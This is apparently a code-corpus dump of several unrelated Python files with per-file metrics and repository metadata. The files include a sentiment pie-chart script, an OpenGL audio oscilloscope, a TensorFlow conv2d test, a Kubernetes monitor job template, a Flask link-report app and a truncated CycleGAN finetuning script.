plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
def current_senti_graph():
print("current_neutral:{} \ncurrent_positive:{}, \ncurrent_negative:{}".format(current_neutral, current_positive, current_negative))
print("IndexError_SUM:{}".format(indexerror_sum))
X = np.array(['current_neutral', 'current_positive', 'current_negative'])
Y = np.array([current_neutral, current_positive, current_negative])
plt.title('Current_Sentiment')
plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
def previous_senti_graph():
print("previous_neutral:{} \n previous_positive:{}, \n previous_negarive:{}".format(previous_neutral, previous_positive, previous_negative))
X = np.array(['previous_neutral', 'previous_positive', 'previous_negative'])
Y = np.array([previous_neutral, previous_positive, previous_negative])
plt.title('Previous_Sentiment')
plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
# emotion
# label index mapping = {'neutral': 0, 'surprise': 1, 'fear': 2, 'sadness': 3, 'joy': 4, 'disgust': 5, 'anger': 6}
def current_emo_graph():
print('current_neutral:{}, current_surprise:{}, current_fear:{}, current_sadness:{}, current_joy:{}, current_disgust:{}, current_anger:{}'.format(current_neu, current_sur, current_fea, current_sad, current_joy, current_dis, current_ang))
X = np.array(['neutral', 'surprise', 'fear', 'sadness', 'joy', 'disgust', 'anger'])
Y = np.array([current_neu, current_sur, current_fea, current_sad, current_joy, current_dis, current_ang])
plt.title('Current_Emotion')
plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
def previous_emo_graph():
print('pre_neutral:{}, pre_surprise:{}, pre_fear:{}, pre_sadness:{}, pre_joy:{}, pre_disgust:{}, pre_anger:{}'.format(pre_neu, pre_sur, pre_fea, pre_sad, pre_joy, pre_dis, pre_ang))
X = np.array(['neutral', 'surprise', 'fear', 'sadness', 'joy', 'disgust', 'anger'])
Y = np.array([pre_neu, pre_sur, pre_fea, pre_sad, pre_joy, pre_dis, pre_ang])
plt.title('Previous_Emotion')
plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
if __name__ == '__main__':
# current_senti_graph()
# previous_senti_graph()
# current_emo_graph()
# previous_emo_graph()
whole_senti_graph()
# whole_emo_graph()
| 35.72 | 241 | 0.634814 | 1,029 | 8,037 | 4.724976 | 0.14966 | 0.016454 | 0.019745 | 0.018511 | 0.371658 | 0.31777 | 0.299054 | 0.290621 | 0.247429 | 0.238996 | 0 | 0.024142 | 0.216623 | 8,037 | 224 | 242 | 35.879464 | 0.748094 | 0.177181 | 0 | 0.192308 | 0 | 0 | 0.177589 | 0.022199 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044872 | false | 0.032051 | 0.051282 | 0 | 0.108974 | 0.044872 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a29ef47ca666384abf9e6ed95f2497dd46437592 | 4,682 | py | Python | Tutorial_8/main.py | xziyue/pyopengl_series_source | 3dc6afa808fc62aa3fd0b17631758f9f437ebd15 | [
"MIT"
] | 1 | 2022-02-25T12:24:42.000Z | 2022-02-25T12:24:42.000Z | Tutorial_8/main.py | xziyue/pyopengl_series_source | 3dc6afa808fc62aa3fd0b17631758f9f437ebd15 | [
"MIT"
] | null | null | null | Tutorial_8/main.py | xziyue/pyopengl_series_source | 3dc6afa808fc62aa3fd0b17631758f9f437ebd15 | [
"MIT"
] | 4 | 2020-11-17T21:59:19.000Z | 2022-03-05T11:31:26.000Z | import audioread
import numpy as np
import openal
audioBuffer = []
sampleRate = None
audioLength = None
soundFile = 'Jerobeam Fenderson - Planets.wav'
# open with OpenAL
alSound = openal.oalOpen(soundFile)
# load audio
with audioread.audio_open(soundFile) as inaudio:
assert inaudio.channels == 2
sampleRate = inaudio.samplerate
audioLength = inaudio.duration
for buf in inaudio:
data = np.frombuffer(buf, dtype=np.int16)
audioBuffer.append(data)
dataBuffer = np.concatenate(audioBuffer).reshape((-1, 2)).astype(np.float32)
numTotalSamples = dataBuffer.shape[0]
dataBuffer /= (0x7fff - 1) # max value of int16
dataBuffer = dataBuffer.flatten()
'''
# shows Lissajous curve
#tArray = np.arange(0, 1000000).astype(np.float)
tArray = np.linspace(0, 1000000, 1000000).astype(np.float)
numTotalSamples = tArray.size
x = np.sin(5.0 * tArray)
y = np.sin(4.0 * tArray)
sampleRate = 40000
audioLength = tArray.size // sampleRate
dataBuffer = np.stack([x, y], axis=1)
dataBuffer -= dataBuffer.min()
dataBuffer /= dataBuffer.max()
dataBuffer = (dataBuffer - 0.5) * 2.0
dataBuffer = dataBuffer.astype(np.float32).flatten()
'''
from OpenGL.GL import *
from OpenGL.arrays.vbo import VBO
import glfw
import platform as pyPlatform
import ctypes
from datetime import datetime
# add last folder into PYTHONPATH
import sys, os
lastFolder = os.path.split(os.getcwd())[0]
sys.path.append(lastFolder)
from gl_lib.transmat import *
from gl_lib.utility import *
from gl_lib.fps_camera import *
from Tutorial_8.shader import *
windowSize = (800, 600)
windowBackgroundColor = (0.2, 0.2, 0.2, 1.0)
waveColor = np.asarray([0.0, 1.0, 0.0], np.float32)
tailDuration = 0.1
numTailSamples = int(np.round(tailDuration * sampleRate))
def debug_message_callback(source, msg_type, msg_id, severity, length, raw, user):
msg = raw[0:length]
print('debug', source, msg_type, msg_id, severity, msg)
def create_uniform(programId, infos):
result = dict()
for name, tp in infos:
uniform = GLUniform(programId, name, tp)
result[name] = uniform
return result
if __name__ == '__main__':
# initialize glfw
glfw.init()
# set glfw config
glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 3)
glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 3)
glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)
if pyPlatform.system().lower() == 'darwin':
glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, GL_TRUE)
# create window
theWindow = glfw.create_window(windowSize[0], windowSize[1], 'Audio Oscilloscope', None, None)
# make window the current context
glfw.make_context_current(theWindow)
# enable z-buffer
glEnable(GL_DEPTH_TEST)
dataVBO = VBO(dataBuffer, usage='GL_STATIC_DRAW')
dataVAO = glGenVertexArrays(1)
glBindVertexArray(dataVAO)
dataVBO.bind()
dataVBO.copy_data()
glVertexAttribPointer(0, 2, GL_FLOAT, GL_FALSE, 2 * ctypes.sizeof(ctypes.c_float), ctypes.c_void_p(0))
glEnableVertexAttribArray(0)
dataVBO.unbind()
glBindVertexArray(0)
renderProgram = GLProgram(waveVertexShaderSource, waveFragmentShaderSource)
renderProgram.compile_and_link()
waveColorUniform = GLUniform(renderProgram.get_program_id(), 'waveColor', 'vec3f')
# change drawing mode
# glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
startTime = glfw.get_time()
soundPlayed = False
# keep rendering until the window should be closed
while not glfw.window_should_close(theWindow):
nowTime = glfw.get_time()
if nowTime - startTime > audioLength:
glfw.set_window_should_close(theWindow, True)
continue
# set background color
glClearColor(*windowBackgroundColor)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
aspect = windowSize[0] / windowSize[1]
renderProgram.use()
waveColorUniform.update(waveColor)
nowLocation = min(numTotalSamples, int(np.round((nowTime - startTime) * sampleRate)))
startLocation = max(0, nowLocation - numTailSamples)
glBindVertexArray(dataVAO)
glDrawArrays(GL_POINTS, startLocation, nowLocation - startLocation)
glBindVertexArray(0)
# tell glfw to poll and process window events
glfw.poll_events()
# swap frame buffer
glfw.swap_buffers(theWindow)
if not soundPlayed:
alSound.play()
soundPlayed = True
# clean up VAO
glDeleteVertexArrays(1, [dataVAO])
# clean up VBO
dataVBO.delete()
# clean up program
renderProgram.delete()
# terminate glfw
glfw.terminate()
openal.oalQuit()
| 26.908046 | 106 | 0.703118 | 570 | 4,682 | 5.649123 | 0.415789 | 0.031056 | 0.017391 | 0.02236 | 0.051553 | 0.036025 | 0 | 0 | 0 | 0 | 0 | 0.025451 | 0.194361 | 4,682 | 173 | 107 | 27.063584 | 0.828208 | 0.09056 | 0 | 0.042105 | 0 | 0 | 0.025736 | 0 | 0 | 0 | 0.001592 | 0 | 0.010526 | 1 | 0.021053 | false | 0 | 0.147368 | 0 | 0.178947 | 0.010526 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2a27e6e750f04e65c2fd9e64ce1f190d0b8590a | 4,341 | py | Python | test/python/test_conv2dbackpropinput.py | sreeni-k/ngraph-tf | 4280a49ecffb92bb1ffa8ea212b22e0db8729f6e | [
"Apache-2.0"
] | null | null | null | test/python/test_conv2dbackpropinput.py | sreeni-k/ngraph-tf | 4280a49ecffb92bb1ffa8ea212b22e0db8729f6e | [
"Apache-2.0"
] | null | null | null | test/python/test_conv2dbackpropinput.py | sreeni-k/ngraph-tf | 4280a49ecffb92bb1ffa8ea212b22e0db8729f6e | [
"Apache-2.0"
] | null | null | null | # ==============================================================================
# Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""nGraph TensorFlow bridge depthwise_conv2d operation test
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pytest
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import nn_ops
from common import NgraphTest
import numpy as np
class TestConv2DBackpropInput(NgraphTest):
INPUT_SIZES_NCHW = [1, 2, 7, 6]
INPUT_SIZES_NHWC = [1, 7, 6, 2]
FILTER_IN_SIZES = [3, 3, 2, 2]
OUT_BACKPROP_IN_SIZES = {"VALID": [1, 2, 3, 2], "SAME": [1, 2, 4, 3]}
def make_filter_and_backprop_args(self, out_backprop_in_sizes):
total_size_1 = 1
total_size_2 = 1
for s in out_backprop_in_sizes:
total_size_1 *= s
for s in self.FILTER_IN_SIZES:
total_size_2 *= s
x1 = [f * 1.0 for f in range(1, total_size_1 + 1)]
x2 = [f * 1.0 for f in range(1, total_size_2 + 1)]
return x1, x2
@pytest.mark.parametrize("padding", ("VALID", "SAME"))
def test_nchw(self, padding):
# The expected size of the backprop will depend on whether padding is VALID
# or SAME.
out_backprop_in_sizes = self.OUT_BACKPROP_IN_SIZES[padding]
x1, x2 = self.make_filter_and_backprop_args(out_backprop_in_sizes)
def run_test_ngraph(sess):
t1 = constant_op.constant(self.INPUT_SIZES_NCHW)
t2 = constant_op.constant(x2, shape=self.FILTER_IN_SIZES)
t3 = constant_op.constant(x1, shape=out_backprop_in_sizes)
inp = nn_ops.conv2d_backprop_input(
t1,
t2,
t3,
strides=[1, 1, 2, 2],
padding=padding,
data_format='NCHW')
return sess.run(inp)
# To validate on the CPU side we will need to run in NHWC, because the CPU
# implementation of conv/conv backprop does not support NCHW. We will
# transpose on the way in and on the way out.
def run_test_tf(sess):
t1 = constant_op.constant(self.INPUT_SIZES_NHWC)
t2 = constant_op.constant(x2, shape=self.FILTER_IN_SIZES)
t3 = constant_op.constant(x1, shape=out_backprop_in_sizes)
t3 = tf.transpose(t3, [0, 2, 3, 1])
inp = nn_ops.conv2d_backprop_input(
t1,
t2,
t3,
strides=[1, 2, 2, 1],
padding=padding,
data_format='NHWC')
inp = tf.transpose(inp, [0, 3, 1, 2])
return sess.run(inp)
assert np.allclose(
self.with_ngraph(run_test_ngraph), self.without_ngraph(run_test_tf))
@pytest.mark.skip(reason="Fails, needs debugging")
@pytest.mark.parametrize("padding", ("VALID", "SAME"))
def test_nhwc(self, padding):
out_backprop_in_sizes = self.OUT_BACKPROP_IN_SIZES[padding]
x1, x2 = self.make_filter_and_backprop_args(out_backprop_in_sizes)
t1 = constant_op.constant(self.INPUT_SIZES_NHWC)
t2 = constant_op.constant(x2, shape=self.FILTER_IN_SIZES)
t3 = constant_op.constant(x1, shape=out_backprop_in_sizes)
t3 = tf.transpose(t3, [0, 2, 3, 1])
inp = nn_ops.conv2d_backprop_input(
t1,
t2,
t3,
strides=[1, 2, 2, 1],
padding=padding,
data_format='NHWC')
def run_test(sess):
return sess.run(inp)
assert (
self.with_ngraph(run_test) == self.without_ngraph(run_test)).all()
| 37.102564 | 83 | 0.608155 | 590 | 4,341 | 4.245763 | 0.261017 | 0.047505 | 0.062275 | 0.086228 | 0.468263 | 0.397605 | 0.397605 | 0.37525 | 0.323353 | 0.323353 | 0 | 0.034331 | 0.268602 | 4,341 | 116 | 84 | 37.422414 | 0.754646 | 0.241419 | 0 | 0.5 | 0 | 0 | 0.022964 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 1 | 0.078947 | false | 0 | 0.118421 | 0.013158 | 0.315789 | 0.013158 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2a400716f3e13183b5cef28f9e408102ab1984b | 1,266 | py | Python | chemevo/scripts/YieldsPlots.py | ktfm2/Kai_updates | f731922d3e140c1f16ea9b4b45f39232fe19a1ba | [
"MIT"
] | 1 | 2020-03-30T02:33:45.000Z | 2020-03-30T02:33:45.000Z | chemevo/scripts/YieldsPlots.py | ktfm2/Kai_updates | f731922d3e140c1f16ea9b4b45f39232fe19a1ba | [
"MIT"
] | null | null | null | chemevo/scripts/YieldsPlots.py | ktfm2/Kai_updates | f731922d3e140c1f16ea9b4b45f39232fe19a1ba | [
"MIT"
] | 2 | 2018-09-26T05:15:33.000Z | 2020-09-27T21:10:11.000Z | # coding: utf-8
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import pandas as pd
def yields_plot(fname,outname,masses=[1.,2.,5.],Z=0.001,lim=[10**-18,50.],label='',clabel=r'$M_\star/\mathrm{M}_\odot$'):
data = pd.read_csv(fname,sep=r'\s+')
data = data[data.Z==Z].reset_index(drop=True)
fig = plt.figure(figsize=[15.,4.])
norm = colors.Normalize(vmin=np.min(masses),vmax=np.max(masses))
c_m = plt.cm.viridis
s_m = plt.cm.ScalarMappable(cmap=c_m, norm=norm)
s_m.set_array([])
for m in masses:
plt.plot(data[data.M==m].Yield.values,'.-',markersize=10,color=s_m.to_rgba(m))
cmm=plt.colorbar(s_m)
cmm.set_label(clabel)
ele = data.Element.values
indexes = np.unique(ele, return_index=True)[1]
el= [ele[index] for index in sorted(indexes)]
plt.xticks(range(len(el)),el)
plt.semilogy()
plt.ylabel(r'$M_\mathrm{el}/\mathrm{M}_\odot$')
plt.ylim(lim[0],lim[1])
plt.annotate(label,
xy=(0.95,0.05),horizontalalignment='right',verticalalignment='bottom',
xycoords='axes fraction',clip_on=False,fontsize=24)
plt.tight_layout()
plt.savefig(outname)
if __name__ == '__main__':
yields_plot('tmp','output.png')
| 32.461538 | 121 | 0.651659 | 204 | 1,266 | 3.906863 | 0.544118 | 0.010038 | 0.027604 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028382 | 0.165087 | 1,266 | 38 | 122 | 33.315789 | 0.725639 | 0.010269 | 0 | 0 | 0 | 0 | 0.086331 | 0.046363 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.133333 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2a7c07340e6fb5b1178797bdbd9ffee13790ccb | 4,179 | py | Python | src/a01/jobs/monitor.py | mcardosos/adx-automation-client | d657ff85b0f0e408e5c64703c47798d164f49a35 | [
"MIT"
] | null | null | null | src/a01/jobs/monitor.py | mcardosos/adx-automation-client | d657ff85b0f0e408e5c64703c47798d164f49a35 | [
"MIT"
] | null | null | null | src/a01/jobs/monitor.py | mcardosos/adx-automation-client | d657ff85b0f0e408e5c64703c47798d164f49a35 | [
"MIT"
] | null | null | null | from typing import List
from kubernetes.client.models.v1_config_map_key_selector import V1ConfigMapKeySelector
from kubernetes.client.models.v1_job import V1Job
from kubernetes.client.models.v1_job_spec import V1JobSpec
from kubernetes.client.models.v1_object_meta import V1ObjectMeta
from kubernetes.client.models.v1_container import V1Container
from kubernetes.client.models.v1_pod_spec import V1PodSpec
from kubernetes.client.models.v1_pod_template_spec import V1PodTemplateSpec
from kubernetes.client.models.v1_local_object_reference import V1LocalObjectReference
from kubernetes.client.models.v1_env_var import V1EnvVar
from kubernetes.client.models.v1_env_var_source import V1EnvVarSource
from kubernetes.client.models.v1_secret_key_selector import V1SecretKeySelector
from a01.models import Run
from a01.common import EMAIL_ACCOUNT_SECRET_NAME, EMAIL_SERVICE_FAIL_RESET_LIMIT, COMMON_IMAGE_PULL_SECRET
MONITOR_IMAGE = 'azureclidev.azurecr.io/a01monitor:latest'
class MonitorTemplate(object):
def __init__(self, run: Run, interval: int = 30, email: str = None) -> None:
self.run = run
self.name = f'a01-monitor-{self.run.id}'
self.labels = {'run_id': str(run.id), 'run_live': run.details['live']}
self.official = run.details.get('remark', '').lower() == 'official'
self.interval = interval
self.email = email
def get_body(self) -> V1Job:
return V1Job(
api_version='batch/v1',
kind='Job',
metadata=self.get_metadata(),
spec=self.get_spec())
def get_metadata(self) -> V1ObjectMeta:
return V1ObjectMeta(name=self.name, labels=self.labels)
def get_spec(self) -> V1JobSpec:
return V1JobSpec(backoff_limit=EMAIL_SERVICE_FAIL_RESET_LIMIT, template=self.get_template())
def get_template(self) -> V1PodTemplateSpec:
return V1PodTemplateSpec(
metadata=V1ObjectMeta(name=self.name, labels=self.labels),
spec=self.get_pod_spec())
def get_pod_spec(self) -> V1PodSpec:
return V1PodSpec(
containers=self.get_containers(),
image_pull_secrets=[V1LocalObjectReference(name=COMMON_IMAGE_PULL_SECRET)],
restart_policy='Never')
def get_containers(self) -> List[V1Container]:
return [V1Container(name=f'main', image=MONITOR_IMAGE, env=self.get_environment_variables())]
def get_environment_variables(self) -> List[V1EnvVar]:
environment = [
V1EnvVar(name='A01_MONITOR_RUN_ID', value=str(self.run.id)),
V1EnvVar(name='A01_MONITOR_INTERVAL', value=str(self.interval)),
V1EnvVar(name='A01_STORE_NAME', value='task-store-web-service-internal/api'),
V1EnvVar(name='A01_INTERNAL_COMKEY', value_from=V1EnvVarSource(
secret_key_ref=V1SecretKeySelector(name='a01store', key='internal.key')))
]
if self.email or self.official:
environment.extend([
self._map_secret_to_env('A01_REPORT_SMTP_SERVER', 'server'),
self._map_secret_to_env('A01_REPORT_SENDER_ADDRESS', 'username'),
self._map_secret_to_env('A01_REPORT_SENDER_PASSWORD', 'password')])
if self.official:
environment.append(self._map_config_to_env('A01_REPORT_RECEIVER', 'official.email'))
elif self.email:
environment.append(V1EnvVar(name='A01_REPORT_RECEIVER', value=self.email))
return environment
@staticmethod
def _map_secret_to_env(env_name: str, secret_key: str) -> V1EnvVar:
return V1EnvVar(name=env_name,
value_from=V1EnvVarSource(
secret_key_ref=V1SecretKeySelector(
name=EMAIL_ACCOUNT_SECRET_NAME,
key=secret_key)))
def _map_config_to_env(self, env_name: str, config_key: str) -> V1EnvVar:
config_name = self.run.details['product']
return V1EnvVar(name=env_name,
value_from=V1EnvVarSource(
config_map_key_ref=V1ConfigMapKeySelector(name=config_name, key=config_key)))
| 44.935484 | 106 | 0.689878 | 499 | 4,179 | 5.492986 | 0.226453 | 0.056184 | 0.080263 | 0.104341 | 0.272163 | 0.202116 | 0.156877 | 0.093032 | 0 | 0 | 0 | 0.025236 | 0.21297 | 4,179 | 92 | 107 | 45.423913 | 0.808148 | 0 | 0 | 0.054054 | 0 | 0 | 0.094999 | 0.041397 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135135 | false | 0.013514 | 0.189189 | 0.094595 | 0.459459 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2a9508db77d089cd717baa207d26992fc58ffc4 | 3,776 | py | Python | src/app.py | AntiCompositeNumber/linkspam | 12dd89e156abdb3811d863fa47e840086810897d | [
"Apache-2.0"
] | 1 | 2019-12-10T16:37:22.000Z | 2019-12-10T16:37:22.000Z | src/app.py | AntiCompositeNumber/linkspam | 12dd89e156abdb3811d863fa47e840086810897d | [
"Apache-2.0"
] | 18 | 2019-11-15T21:44:52.000Z | 2020-01-03T05:54:56.000Z | src/app.py | AntiCompositeNumber/linkspam | 12dd89e156abdb3811d863fa47e840086810897d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
# SPDX-License-Identifier: Apache-2.0
# Copyright 2019 AntiCompositeNumber
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import json
import subprocess
import flask
# Configure logging
logging.basicConfig(filename='linkspam.log', level=logging.DEBUG)
# Set up Flask app
app = flask.Flask(__name__)
# Load config from json in the same directory as the app
__dir__ = os.path.dirname(__file__)
with open(os.path.join(__dir__, 'config.json')) as f:
app.config.update(json.load(f))
# Get the short hash for the current git commit
rev = subprocess.run(['git', 'rev-parse', '--short', 'HEAD'],
universal_newlines=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
app.config['version'] = rev.stdout
@app.route('/')
def linksearch():
# Front page
with open(os.path.join(app.config['linkspam_data_dir'],
'linkspam_config.json')) as f:
data = json.load(f)
return flask.render_template('linkspam.html', data=data)
# @app.route('/<target>/job')
# def linksearch_job(target):
# percent = flask.request.args.get('percent', '')
# return flask.render_template('linkspam_submit.html',
# percent=percent)
@app.route('/api')
def api():
return
@app.route('/api/status')
def api_status():
with open(os.path.join(app.config['linkspam_data_dir'],
'linkspam_config.json')) as f:
data = json.load(f)
return data
@app.route('/api/status/<target>')
def api_status_target(target):
with open(os.path.join(app.config['linkspam_data_dir'],
'linkspam_config.json')) as f:
data = json.load(f)
target_info = data.get(target)
if not target_info:
flask.abort(404)
else:
return target_info
@app.route('/api/report/<target>')
def api_report_target(target):
try:
with open(os.path.join(app.config['linkspam_data_dir'],
target + '.json')) as f:
data = json.load(f)
except FileNotFoundError:
# If there is no file found, return 404
flask.abort(404)
else:
return data
@app.route('/<target>')
def linksearch_result(target):
# Result pages
# Try to load the report specified in the URL
try:
with open(os.path.join(app.config['linkspam_data_dir'],
target + '.json')) as f:
data = json.load(f)
except FileNotFoundError:
# If there is no file found, return a custom 404
return flask.render_template(
'linkspam_noresult.html', target=target), 404
else:
# Otherwise, show the report
return flask.render_template('linkspam_result.html', data=data)
@app.route('/<target>/status')
def linksearch_status(target):
with open(os.path.join(app.config['linkspam_data_dir'],
'linkspam_config.json')) as f:
data = json.load(f)
target_info = data.get(target)
if not target_info:
return flask.render_template(
'linkspam_noresult.html', target=target), 404
else:
return flask.render_template('status.html', data=target_info)
| 29.046154 | 74 | 0.644068 | 502 | 3,776 | 4.731076 | 0.304781 | 0.020211 | 0.029474 | 0.041263 | 0.413053 | 0.346947 | 0.325053 | 0.325053 | 0.325053 | 0.325053 | 0 | 0.010438 | 0.238877 | 3,776 | 129 | 75 | 29.271318 | 0.815936 | 0.305614 | 0 | 0.535211 | 0 | 0 | 0.159599 | 0.016962 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098592 | false | 0 | 0.070423 | 0.014085 | 0.295775 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2a954aea3a61fd5213339931e0d242897520116 | 1,130 | py | Python | setup.py | woctezuma/puissance4 | 68f82149515ebe87f545cb6211670df75210e702 | [
"MIT"
] | 2 | 2017-05-15T15:33:45.000Z | 2020-10-24T11:09:12.000Z | setup.py | woctezuma/puissance4 | 68f82149515ebe87f545cb6211670df75210e702 | [
"MIT"
] | 2 | 2018-05-02T21:45:33.000Z | 2020-10-24T11:13:05.000Z | setup.py | woctezuma/puissance4 | 68f82149515ebe87f545cb6211670df75210e702 | [
"MIT"
] | null | null | null | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='puissance4',
version='0.6.1',
author='Wok',
author_email='wok@tuta.io',
description='Artificial Intelligence for the game Connect Four on PyPI',
keywords=['puissance4', 'puissance-4', 'connect4', 'connect-4', 'connect-four', 'artificial intelligence', 'UCT'],
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/woctezuma/puissance4',
download_url='https://github.com/woctezuma/puissance4/archive/0.6.1.tar.gz',
packages=setuptools.find_packages(),
install_requires=[
],
test_suite='nose.collector',
tests_require=['nose'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Topic :: Games/Entertainment',
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
'Intended Audience :: End Users/Desktop',
'Natural Language :: French',
],
python_requires='>=3',
)
| 34.242424 | 118 | 0.656637 | 125 | 1,130 | 5.832 | 0.712 | 0.082305 | 0.00823 | 0.082305 | 0.098765 | 0.098765 | 0 | 0 | 0 | 0 | 0 | 0.017486 | 0.190265 | 1,130 | 32 | 119 | 35.3125 | 0.779235 | 0 | 0 | 0.066667 | 0 | 0.033333 | 0.484071 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.033333 | 0 | 0.033333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2abf30e4b7b9b1f3639d619209a87cba5e30d20 | 12,691 | py | Python | finetune.py | pawopawo/GAN-pruning | d3cb25d127e082c3304971ed4ae74b6e6dcb3adb | [
"BSD-3-Clause"
] | 1 | 2020-07-02T16:16:48.000Z | 2020-07-02T16:16:48.000Z | finetune.py | pawopawo/GAN-pruning | d3cb25d127e082c3304971ed4ae74b6e6dcb3adb | [
"BSD-3-Clause"
] | null | null | null | finetune.py | pawopawo/GAN-pruning | d3cb25d127e082c3304971ed4ae74b6e6dcb3adb | [
"BSD-3-Clause"
] | null | null | null | import argparse
import itertools
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
from torch.autograd import Variable
from PIL import Image
import torch
import torch.nn as nn
import numpy as np
from models import Generator
from models import Discriminator
from models_prune import Generator_Prune
from models_prune import compute_layer_mask
from utils import ReplayBuffer
from utils import LambdaLR
from utils import weights_init_normal
from datasets import ImageDataset
import numpy as np
#copy data and pretrained model to finetuning environment
import moxing as mox
mox.file.copy_parallel("s3://data/horse2zebra","/cache/data/horse2zebra")
mox.file.copy_parallel("s3://models/CycleGAN/horse2zebra/output","/cache/log/output")
mox.file.copy_parallel("s3://models/GA/txt","/cache/GA/txt")
parser = argparse.ArgumentParser()
parser.add_argument('--data_url', type=str, default='', help='root directory of the dataset')
parser.add_argument('--train_url', type=str, default='', help='root directory of the dataset')
parser.add_argument('--num_gpus', type=int, default=8, help='num_gpu')
parser.add_argument('--init_method', type=str, default='', help='init method')
parser.add_argument('--epoch', type=int, default=0, help='starting epoch')
parser.add_argument('--n_epochs', type=int, default=201, help='number of epochs of training')
parser.add_argument('--batchSize', type=int, default=8, help='size of the batches')
parser.add_argument('--dataroot', type=str, default='/cache/data/horse2zebra', help='root directory of the dataset')
parser.add_argument('--lr', type=float, default=0.0002, help='initial learning rate')
parser.add_argument('--decay_epoch', type=int, default=100, help='epoch to start linearly decaying the learning rate to 0')
parser.add_argument('--size', type=int, default=256, help='size of the data crop (squared assumed)')
parser.add_argument('--input_nc', type=int, default=3, help='number of channels of input data')
parser.add_argument('--output_nc', type=int, default=3, help='number of channels of output data')
parser.add_argument('--cuda', type=bool, default =True, help='use GPU computation')
parser.add_argument('--n_cpu', type=int, default=8, help='number of cpu threads to use during batch generation')
opt = parser.parse_args()
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
#construct mask
first_conv_out=64
mask_chns=[]
mask_chns.append(first_conv_out) #1st conv
